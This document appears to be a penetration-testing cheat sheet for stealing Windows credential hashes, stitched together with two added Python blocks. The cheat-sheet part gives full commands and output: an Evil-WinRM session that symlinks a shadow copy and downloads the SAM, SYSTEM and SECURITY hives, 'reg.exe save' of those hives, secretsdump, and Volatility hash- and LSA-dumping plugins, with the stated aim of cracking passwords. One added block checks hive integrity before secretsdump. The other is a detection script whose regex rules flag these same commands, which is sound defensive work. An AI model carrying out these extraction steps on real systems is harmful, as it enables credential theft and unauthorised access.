You need at least local administrator privileges on the remote target; use the --local-auth option if your user is a local account.
Shadow Copies
Enumerate the host for shadow copy volumes
*Evil-WinRM* PS C:\Users\Administrator\Documents> vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {00168<-SNIP->d07ca}
   Contained 1 shadow copies at creation time: 9/9/2019 3:10:57 AM
      Shadow Copy ID: {04639<-SNIP->b017ef}
         Original Volume: (C:)\\?\Volume{21385<-SNIP->0000}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: foo.bar.local
         Service Machine: foo.bar.local
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cmd /c mklink /d C:\VSS \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
symbolic link created for C:\VSS <<===>> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SAM
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\\VSS\\windows\\system32\\config\\SAM to SAM
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SYSTEM
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\\VSS\\windows\\system32\\config\\SYSTEM to SYSTEM
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SECURITY
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\\VSS\\windows\\system32\\config\\SECURITY to SECURITY
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
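"Download successful!" only confirms the transfer, not that what arrived is a usable hive. The following is an added example (not part of the original page and not Impacket's code) of a sanity check to run on SAM, SYSTEM and SECURITY before secretsdump: it verifies the regf signature of each file, recomputes the base-block checksum, and compares the primary and secondary sequence numbers, which differ when the copy was taken while a write was in flight and the hive's transaction logs have not been replayed. The build_test_header helper constructs synthetic base blocks for demonstration; their file names and version numbers are made up.

```python
import struct
import sys
from pathlib import Path

BASE_BLOCK_SIZE = 4096  # a hive starts with one 4 KiB base block (the "regf" header)
CHECKSUM_RANGE = 508    # the checksum at offset 508 covers bytes 0..507 as 127 LE DWORDs


def regf_checksum(header: bytes) -> int:
    """XOR of the first 127 little-endian DWORDs of the base block.

    Windows maps a result of 0 to 1 and a result of 0xFFFFFFFF to 0xFFFFFFFE.
    """
    csum = 0
    for (dword,) in struct.iter_unpack("<I", header[:CHECKSUM_RANGE]):
        csum ^= dword
    if csum == 0:
        return 1
    if csum == 0xFFFFFFFF:
        return 0xFFFFFFFE
    return csum


def inspect_hive(data: bytes) -> dict:
    """Parse the fixed fields of a hive base block and report whether it is usable."""
    if len(data) < BASE_BLOCK_SIZE:
        return {"ok": False, "reason": "file shorter than one 4 KiB base block"}
    if data[:4] != b"regf":
        return {"ok": False, "reason": "missing 'regf' signature"}

    primary_seq, secondary_seq = struct.unpack_from("<II", data, 4)
    major, minor = struct.unpack_from("<II", data, 20)
    # Offset 48 holds the hive's file name as NUL-padded UTF-16LE (64 bytes).
    name = data[48:112].decode("utf-16-le", errors="replace").rstrip("\x00")
    stored = struct.unpack_from("<I", data, CHECKSUM_RANGE)[0]

    report = {
        "ok": True,
        "version": f"{major}.{minor}",
        "name": name,
        "primary_seq": primary_seq,
        "secondary_seq": secondary_seq,
        "checksum_valid": stored == regf_checksum(data),
        "dirty": primary_seq != secondary_seq,
    }
    if not report["checksum_valid"]:
        report["ok"] = False
        report["reason"] = "base-block checksum mismatch (truncated or corrupted copy)"
    elif report["dirty"]:
        # The primary number is bumped before a write and the secondary after it,
        # so a mismatch means the copy was taken mid-transaction and the .LOG1/.LOG2
        # transaction logs would have to be replayed to get a consistent view.
        report["ok"] = False
        report["reason"] = "sequence numbers differ: hive is dirty, transaction logs not applied"
    return report


def inspect_hive_file(path: str) -> dict:
    return inspect_hive(Path(path).read_bytes())


def build_test_header(name: str, primary: int, secondary: int, corrupt: bool = False) -> bytes:
    """Construct a synthetic base block for demonstration (not a real hive)."""
    hdr = bytearray(BASE_BLOCK_SIZE)
    hdr[0:4] = b"regf"
    struct.pack_into("<II", hdr, 4, primary, secondary)
    struct.pack_into("<IIII", hdr, 20, 1, 5, 0, 1)  # major 1, minor 5, type 0 (primary), format 1
    struct.pack_into("<I", hdr, 36, 0x20)           # root cell offset, as in real hives
    hdr[48:112] = name.encode("utf-16-le")[:64].ljust(64, b"\x00")
    struct.pack_into("<I", hdr, CHECKSUM_RANGE, regf_checksum(bytes(hdr)))
    if corrupt:
        hdr[100] ^= 0xFF  # flip a byte inside the checksummed range
    return bytes(hdr)


if __name__ == "__main__":
    # Usage: python check_hives.py SAM SYSTEM SECURITY
    for path in sys.argv[1:]:
        print(path, inspect_hive_file(path))
```

A dirty hive is the usual outcome of copying from a shadow copy or a running system; the base block is still parseable, but values written after the last flush live only in the transaction logs, so treat "dirty" as a warning about completeness rather than a corrupt file.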
With Mimikatz
SAM
Windows
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.
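Both extraction paths on this page (vssadmin enumeration followed by an mklink into a HarddiskVolumeShadowCopy device, and reg.exe save of the SAM/SYSTEM/SECURITY hives) leave process-creation evidence. The following is an added detection example, not from the original page: it runs three command-line rules over a few constructed process-creation records whose field names follow Sysmon Event ID 1 (the JSON-lines export shape, the users and the host names are assumptions), tags each hit with whether the process was spawned under the WinRM host wsmprovhost.exe, and escalates only users who went beyond enumeration, since backup software lists shadow copies routinely. Note that the Evil-WinRM download step runs inside the existing WinRM PowerShell session rather than as a new process, so the read of C:\VSS\...\config\SAM through the symlink needs file-access auditing on the hive paths, not a process-creation rule.

```python
import json
import re

# Detection rules keyed to the commands on this page.  Each is a case-insensitive
# regex over the process command line; all map to MITRE ATT&CK T1003.002 (SAM).
RULES = [
    ("shadow_copy_enumeration", re.compile(r"\bvssadmin\b.*\blist\s+shadows\b", re.I)),
    ("shadow_copy_symlink",     re.compile(r"\bmklink\b.*HarddiskVolumeShadowCopy\d+", re.I)),
    ("registry_hive_save",      re.compile(r"\breg(\.exe)?\b.*?\bsave\s+hklm\\(sam|system|security)\b", re.I)),
]

# Rules that only make sense as part of hive extraction; enumeration alone is
# routine for backup software, so it is reported but not escalated on its own.
ESCALATE = {"shadow_copy_symlink", "registry_hive_save"}

# Constructed process-creation records (JSON lines).  Field names follow Sysmon
# Event ID 1; the export shape, users and hosts are assumptions for this demo.
SAMPLE_EVENTS = r"""
{"UtcTime":"2019-09-09 03:12:01","User":"BAR\\Administrator","Image":"C:\\Windows\\System32\\vssadmin.exe","ParentImage":"C:\\Windows\\System32\\wsmprovhost.exe","CommandLine":"\"C:\\Windows\\system32\\vssadmin.exe\" list shadows"}
{"UtcTime":"2019-09-09 03:12:40","User":"BAR\\Administrator","Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\wsmprovhost.exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c mklink /d C:\\VSS \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\"}
{"UtcTime":"2019-09-09 03:20:05","User":"FOO\\svc_backup","Image":"C:\\Windows\\System32\\vssadmin.exe","ParentImage":"C:\\Program Files\\Backup\\agent.exe","CommandLine":"vssadmin list shadows /for=C:"}
{"UtcTime":"2019-09-09 03:25:11","User":"BAR\\Administrator","Image":"C:\\Windows\\System32\\reg.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"reg.exe save hklm\\sam C:\\sam.save"}
{"UtcTime":"2019-09-09 03:25:12","User":"BAR\\Administrator","Image":"C:\\Windows\\System32\\reg.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"reg.exe query hklm\\software\\microsoft\\windows\\currentversion"}
{"UtcTime":"2019-09-09 03:30:00","User":"BAR\\alice","Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe C:\\Users\\alice\\notes.txt"}
"""


def match_rules(command_line: str) -> list:
    """Return the names of all rules whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan(jsonl: str):
    """Scan JSON-lines process events.

    Returns (alerts, escalated_users): one alert per matching rule per event,
    tagged with whether the process was spawned under the WinRM host
    (wsmprovhost.exe), plus the users who went beyond enumeration.
    """
    alerts = []
    rules_by_user = {}
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        hits = match_rules(ev.get("CommandLine", ""))
        if not hits:
            continue
        via_winrm = ev.get("ParentImage", "").lower().endswith("\\wsmprovhost.exe")
        for rule in hits:
            alerts.append({
                "time": ev["UtcTime"],
                "user": ev["User"],
                "rule": rule,
                "via_winrm": via_winrm,
                "cmd": ev["CommandLine"],
            })
            rules_by_user.setdefault(ev["User"], set()).add(rule)
    escalated = sorted(u for u, rules in rules_by_user.items() if rules & ESCALATE)
    return alerts, escalated


if __name__ == "__main__":
    found, users = scan(SAMPLE_EVENTS)
    for a in found:
        print(f'{a["time"]} {a["user"]:20} {a["rule"]:26} winrm={a["via_winrm"]} :: {a["cmd"]}')
    print("escalate:", users)
```

On the sample records the backup service account trips only the enumeration rule and is not escalated, while the WinRM-hosted session that went on to create the symlink and save hklm\sam is. The wsmprovhost.exe parent is the useful pivot for this page's scenario: the same commands typed at a local console have a different lineage.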
Memory dump acquisition from the victim host - with WinPmem or FTK Imager
Hashdump / Lsadump
./vol.py -f file.dmp windows.hashdump.Hashdump   # Grab common Windows hashes (SAM+SYSTEM)
./vol.py -f file.dmp windows.cachedump.Cachedump # Grab domain cached credential hashes from the registry
./vol.py -f file.dmp windows.lsadump.Lsadump     # Grab LSA secrets
Resources
Registry hive    Description
hklm\sam         Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext.
hklm\system      Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database.
hklm\security    Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.